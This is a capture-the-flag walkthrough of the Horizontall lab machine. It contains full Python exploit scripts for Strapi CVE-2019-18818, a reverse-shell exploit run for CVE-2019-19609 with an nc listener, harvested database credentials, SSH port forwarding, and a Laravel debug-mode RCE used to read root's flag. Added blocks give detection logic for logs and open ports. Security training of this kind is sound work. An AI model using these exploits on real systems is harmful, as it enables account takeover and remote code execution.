1. IP Address

# Machine Address
10.10.11.105

# Local Address
10.10.14.139

horizontall.htb -> /etc/hosts

2. Nmap

nmap -sV -sC -oA nmap/horizontall 10.10.11.105
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 02:22 EST
Nmap scan report for 10.10.11.105
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.48 seconds

Open ports: 22/tcp SSH, 80/tcp HTTP

3. Gobuster

gobuster dir -u http://horizontall.htb/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://horizontall.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/11 02:40:58 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
/css                  (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
/js                   (Status: 301) [Size: 194] [--> http://horizontall.htb/js/] 
Progress: 15257 / 220561 (6.92%)                                                ^C
[!] Keyboard interrupt detected, terminating.
                                                                                 
===============================================================
2021/11/11 02:47:09 Finished
===============================================================

No useful paths found.

ffuf can be used here too, and a different wordlist can also be used.

gobuster vhost -u http://horizontall.htb -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt

Since this looked like it would be slow, I ran ffuf in parallel as well.

ffuf -w /opt/SecLists/Discovery/DNS/shubs-subdomains.txt -u http://horizontall.htb -H "Host: FUZZ.horizontall.htb" -t 200 -fl 10

The ffuf run above finished first. There were many entries that returned 302. Although it was slow, I waited for gobuster.

Gobuster Out:

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://horizontall.htb
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2021/11/11 03:24:05 Starting gobuster in VHOST enumeration mode
===============================================================
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]
Progress: 49562 / 114442 (43.31%)                       ^C
[!] Keyboard interrupt detected, terminating.

api-prod.horizontall.htb -> /etc/hosts

http://api-prod.horizontall.htb/admin/auth/login

4. CVE-2019-18818

wget:

#!/usr/bin/python
# Exploit Title: Strapi 3.0.0-beta - Set Password (Unauthenticated)
# Date: 2021-08-29
# Exploit Author: David Anglada [CodiObert]
# Vendor Homepage: https://strapi.io/
# Version: 3.0.0-beta
# Tested on: Linux
# CVE: CVE-2019-18818

import requests
import sys
import json

userEmail = "valid@email.com"
strapiUrl = "http://strapi.url"
newPassword = "codiobert"

s = requests.Session()

# Get strapi version
strapiVersion = json.loads(s.get("{}/admin/strapiVersion".format(strapiUrl)).text)

print("[*] strapi version: {}".format(strapiVersion["strapiVersion"]))

# Validate vulnerable version
if strapiVersion["strapiVersion"].startswith('3.0.0-beta') or strapiVersion["strapiVersion"].startswith('3.0.0-alpha'):
	# Password reset
	print("[*] Password reset for user: {}".format(userEmail))
	resetPasswordReq={"email":userEmail, "url":"{}/admin/plugins/users-permissions/auth/reset-password".format(strapiUrl)}
	s.post("{}/".format(strapiUrl), json=resetPasswordReq)

	# Set new password
	print("[*] Setting new password")
	exploit={"code":{}, "password":newPassword, "passwordConfirmation":newPassword}
	r=s.post("{}/admin/auth/reset-password".format(strapiUrl), json=exploit)

	# Check if the password has changed
	if "username" in str(r.content):
		print("[+] New password '{}' set for user {}".format(newPassword, userEmail))
	else:
		print("\033[91m[-] Something went wrong\033[0m")
		sys.exit(1)
else:
	print("\033[91m[-] This version is not vulnerable\033[0m")
	sys.exit(1)

The above did not work.

Second attempt:

import requests
import sys
import json
 
args=sys.argv
 
if len(args) < 4:
    print("Usage: {} <admin_email> <url> <new_password>".format(args[0]))
    exit(-1)
 
email = args[1]
url = args[2]
new_password =  args[3]
 
s  =  requests.Session()
 
version = json.loads(s.get("{}/admin/strapiVersion".format(url)).text)
 
print("[*] Detected version(GET /admin/strapiVersion): {}".format(version["strapiVersion"]))
 
#Request password reset
print("[*] Sending password reset request...")
reset_request={"email":email, "url":"{}/admin/plugins/users-permissions/auth/reset-password".format(url)}
s.post("{}/".format(url), json=reset_request)
 
#Reset password to
print("[*] Setting new password...")
exploit={"code":{}, "password":new_password, "passwordConfirmation":new_password}
r=s.post("{}/admin/auth/reset-password".format(url), json=exploit)
 
print("[*] Response:")
print(str(r.content))

CLI:

python3 meth2.py admin@horizontall.htb http://api-prod.horizontall.htb 123456

Result:

python3 meth2.py admin@horizontall.htb http://api-prod.horizontall.htb 123456
[*] Detected version(GET /admin/strapiVersion): 3.0.0-beta.17.4
[*] Sending password reset request...
[*] Setting new password...
[*] Response:
b'{"jwt":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM2NjIxODcxLCJleHAiOjE2MzkyMTM4NzF9.OiegA_xE8zbXCJC02z9JK8_8DZs2I9kCzAE0Uk-2u5A","user":{"id":3,"username":"admin","email":"admin@horizontall.htb","blocked":null}}'

5. CVE-2019-19609

nc -lvnp 9001

Git:

git clone https://github.com/diego-tella/CVE-2019-19609-EXPLOIT
python3 exploit.py -d api-prod.horizontall.htb -jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM2NjIyMDUxLCJleHAiOjE2MzkyMTQwNTF9.f93JYZArCGszsaQIPBtPZJKgq9QD4xRsViSPHqI9c-Y -l 10.10.14.139 -p 9001
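Both scripts above fingerprint the target with GET /admin/strapiVersion before calling the reset endpoint, and the RCE step follows with a call to the admin plugin routes. The following detection logic, added here as an example and not part of the original writeup, runs that sequence check over constructed nginx access-log lines; the plugin install/uninstall endpoint for CVE-2019-19609 is taken from the public advisory and is an assumption, not something shown on this page.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed nginx access-log lines (not from the box): the first client replays the request
# sequence of the two exploit scripts above, the second is an ordinary admin user.
SAMPLE_LOG = """\
10.10.14.139 - - [11/Nov/2021:08:31:01 +0000] "GET /admin/strapiVersion HTTP/1.1" 200 34 "-" "python-requests/2.26.0"
10.10.14.139 - - [11/Nov/2021:08:31:02 +0000] "POST / HTTP/1.1" 404 60 "-" "python-requests/2.26.0"
10.10.14.139 - - [11/Nov/2021:08:31:03 +0000] "POST /admin/auth/reset-password HTTP/1.1" 200 297 "-" "python-requests/2.26.0"
10.10.14.139 - - [11/Nov/2021:08:34:10 +0000] "POST /admin/plugins/install HTTP/1.1" 200 25 "-" "python-requests/2.26.0"
203.0.113.7 - - [11/Nov/2021:09:02:44 +0000] "GET /admin/auth/login HTTP/1.1" 200 413 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Nov/2021:09:02:50 +0000] "POST /admin/auth/reset-password HTTP/1.1" 200 297 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
WINDOW = timedelta(minutes=10)   # version probe -> reset-password must fall inside this window

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    ev["path"] = ev["path"].split("?", 1)[0]
    return ev

def detect(log_text):
    """Return {client_ip: [finding, ...]} for clients matching the exploit request sequence."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse(line)
        if ev:
            by_ip[ev["ip"]].append(ev)
    findings = defaultdict(list)
    for ip, events in by_ip.items():
        probe_ts = None
        for ev in sorted(events, key=lambda e: e["ts"]):
            if ev["method"] == "GET" and ev["path"] == "/admin/strapiVersion":
                probe_ts = ev["ts"]          # both scripts fingerprint the version first
            elif (ev["method"] == "POST" and ev["path"] == "/admin/auth/reset-password"
                  and ev["status"] == 200 and probe_ts and ev["ts"] - probe_ts <= WINDOW):
                findings[ip].append("CVE-2019-18818: version probe followed by successful password reset")
            elif ev["method"] == "POST" and ev["path"].startswith("/admin/plugins/"):
                # assumed endpoint (public CVE-2019-19609 advisory): plugin install/uninstall routes
                findings[ip].append("CVE-2019-19609: admin plugin install/uninstall call to " + ev["path"])
    return dict(findings)
```

A legitimate reset also POSTs to /admin/auth/reset-password, so the version probe in the same window is what carries the signal; the request body with "code": {} is not in the access log and would need request logging at the proxy to confirm.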

Stabilize the shell:

python -c 'import pty;pty.spawn("/bin/bash")'

User.txt

c7978bf*********

6. Privilege Escalation

myapi/config/environments/development/database.json:

{
  "defaultConnection": "default",
  "connections": {
    "default": {
      "connector": "strapi-hook-bookshelf",
      "settings": {
        "client": "mysql",
        "database": "strapi",
        "host": "127.0.0.1",
        "port": 3306,
        "username": "developer",
        "password": "#J!:F9Zt2u"
      },
      "options": {}
    }
  }
}

With developer : #J!:F9Zt2u you can log in to MySQL. But first:

ss -lp

Check which ports are listening. This looks for ports that nmap did not show. Port 8000 is open. Port forward from the machine to that open port; once an authorized_keys entry is in place you can log in over SSH. To get in, run ssh-keygen again on the machine side and copy its id_rsa.pub together with the VM's id_rsa.pub into authorized_keys.
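The step above is about listeners an external scan cannot see. As an added example (not from the writeup), this parses constructed `ss -lntp`-style output and reports every listening port that was absent from the nmap result, noting whether it is bound to loopback only; the process names and ports in the sample are made up.

```python
import re

# Constructed `ss -lntp` output (not captured from the box): the Laravel dev server on 8000 and
# MySQL are bound to loopback only, which is why an external nmap scan never listed them.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=900,fd=3))
LISTEN  0       128     127.0.0.1:8000       0.0.0.0:*          users:(("php",pid=1450,fd=5))
LISTEN  0       80      127.0.0.1:3306       0.0.0.0:*          users:(("mysqld",pid=1100,fd=20))
LISTEN  0       128     *:80                 *:*                users:(("nginx",pid=1000,fd=6))
LISTEN  0       128     [::1]:1337           [::]:*             users:(("node",pid=1200,fd=18))
"""

LOOPBACK = {"127.0.0.1", "::1"}
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')

def split_addr_port(field):
    """'127.0.0.1:8000' -> ('127.0.0.1', 8000); '[::1]:1337' -> ('::1', 1337); '*:80' -> ('*', 80)."""
    host, _, port = field.rpartition(":")
    return host.strip("[]"), int(port)

def listeners(ss_text):
    """Return {port: (address, process_name)} for every LISTEN line in the ss output."""
    found = {}
    for line in ss_text.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] != "LISTEN":
            continue                      # header line or a non-listening socket
        host, port = split_addr_port(cols[3])
        m = PROC_RE.search(line)
        found[port] = (host, m.group(1) if m else None)
    return found

def hidden_from_scan(ss_text, scanned_ports):
    """Ports listening on the host that did not appear in the external scan, with the likely reason."""
    report = {}
    for port, (host, proc) in listeners(ss_text).items():
        if port in scanned_ports:
            continue
        reason = "loopback only" if host in LOOPBACK else "filtered or not probed"
        report[port] = (host, proc, reason)
    return report
```

Feed it the real `ss -lntp` output and the set of ports nmap reported (here 22 and 80) to get the list of services that are only reachable through a port forward.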

Port forwarding from the VM:

ssh -L 8000:127.0.0.1:8000 strapi@horizontall.htb

If it is reachable from the VM, good -> LARAVEL

http://127.0.0.1:8000/

Searchsploit:

sudo apt -y install exploitdb
searchsploit laravel
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Laravel - 'Hash::make()' Password Truncation Security                                                                      | multiple/remote/39318.txt
Laravel 8.4.2 debug mode - Remote code execution                                                                           | php/webapps/49424.py
Laravel Administrator 4 - Unrestricted File Upload (Authenticated)                                                         | php/webapps/49112.py
Laravel Log Viewer < 0.13.0 - Local File Download                                                                          | php/webapps/44343.py
Laravel Nova 3.7.0 - 'range' DoS                                                                                           | php/webapps/49198.txt
PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)                    | linux/remote/47129.rb
UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read                                                                  | php/webapps/48166.txt
UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload                                                         | php/webapps/46389.py
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Laravel 8.4.2 debug mode - Remote code execution

searchsploit -p 49424
  Exploit: Laravel 8.4.2 debug mode - Remote code execution
      URL: https://www.exploit-db.com/exploits/49424
     Path: /usr/share/exploitdb/exploits/php/webapps/49424.py
File Type: Python script, ASCII text executable

Copied EDB-ID #49424's path to the clipboard

Copy:

cp /usr/share/exploitdb/exploits/php/webapps/49424.py .

Run:

python3 49424.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log 'cat /root/root.txt'

You cannot log in to the port-forwarded machine directly, but by using the exploit and pointing it at the log path, it prints out what is inside…

Root.txt

6f8f2d******************